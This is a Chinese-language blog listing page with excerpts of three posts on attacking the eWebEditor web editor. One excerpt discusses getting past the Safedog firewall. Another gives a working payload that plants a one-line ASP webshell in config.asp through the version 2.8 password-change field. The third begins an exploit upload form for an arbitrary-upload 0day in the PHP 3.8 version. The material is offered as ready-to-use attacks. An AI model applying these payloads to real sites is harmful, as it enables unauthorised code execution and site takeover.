问题ewebeditor编辑器突破安全狗

 题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?         1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。         2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。     当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去...

- 阅读全文 -

ewebeditor 2.8 后台插马

ewebeditor 2.8 后台插上一句话 影响版本:2.8 商业版 攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’ 设置成功后,访问https://www.webshell.cc/ewebeditor/asp/config.asp文件即可, 一句话木马被写入到这个文件里面了.  

- 阅读全文 -

ewebeditor PHP 3.8版本上传任意文件0day

PHP版本的ewebeditor用的比ASP版本的少的多吧,俺是非常少碰到。貌似 听说国外用的非常多。台湾人喜欢用?用的着的关注一下吧。 EXP如下: <title>eWebeditoR3.8 for php任意文件上EXP</title> <form action="" method=post enctype="multipart/form-data"> &l...

- 阅读全文 -